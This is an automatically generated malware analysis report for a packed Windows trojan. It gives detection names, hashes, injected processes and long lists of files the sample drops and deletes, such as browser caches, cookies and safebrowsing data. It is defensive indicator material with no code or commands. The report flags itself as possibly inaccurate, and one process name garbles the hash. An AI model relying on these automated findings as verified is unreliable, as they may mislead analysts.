Gen.Variant.Graftor.297763_b38a20ed8a

by malwarelabrobot on June 29th, 2017 in Malware Descriptions.

Gen:Variant.Zusy.228209 (BitDefender), Trojan:Win32/Asacky!rfn (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.DownLoader24.2646 (DrWeb), Gen:Variant.Zusy.228209 (B) (Emsisoft), ML.Attribute.HighConfidence (Symantec), Trojan.Win32.Regrun (Ikarus), Gen:Variant.Zusy.228209 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), HT_GRAFTOR_GC2800C3.UVPM (TrendMicro), Gen:Variant.Graftor.297763 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b38a20ed8a675be0d249881f091a0b7a
SHA1: 8622a40124b741a7c2527eca7661ae9f3dbf50df
SHA256: 458d219c8a555d89fdcd474b4c0d20789cbd60d8a01b8a585a9780047425b198
SSDeep: 3072:nr1EEnCsT0DG4r6wOQR9khaFtkWOcB1ADM4guYs:r1EEnhTSG4r6FQr/OpM45Y
Size: 137536 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-06 17:02:01
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3380

The Trojan injects its code into the following process(es):

b38a20ed8a675be0d249881f09a0b7a.exe:3404

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe (2388 bytes)
C:\Windows\gcICNI.dll (10 bytes)

The Trojan deletes the following file(s):

C:\Windows\gcICNI.dll (0 bytes)

The process b38a20ed8a675be0d249881f09a0b7a.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\Windows\HODVVjX\JOuGkVG.dll (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Windows\euwEKPo.dll (11 bytes)
C:\Windows\HODVVjX\yhBYqbv.dll (17806 bytes)
C:\Windows\HODVVjX\biHrfVc.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Windows\System32\55ed1\CDClient_EX.sys (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\HODVVjX\MEdRGQmCh.tmp (12 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe (36 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Windows\HODVVjX\YUrQRuLp.dll (917 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Windows\HODVVjX\biHrfVc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\advert[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Windows\HODVVjX\JOuGkVG.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Windows\euwEKPo.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Windows\HODVVjX\YUrQRuLp.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
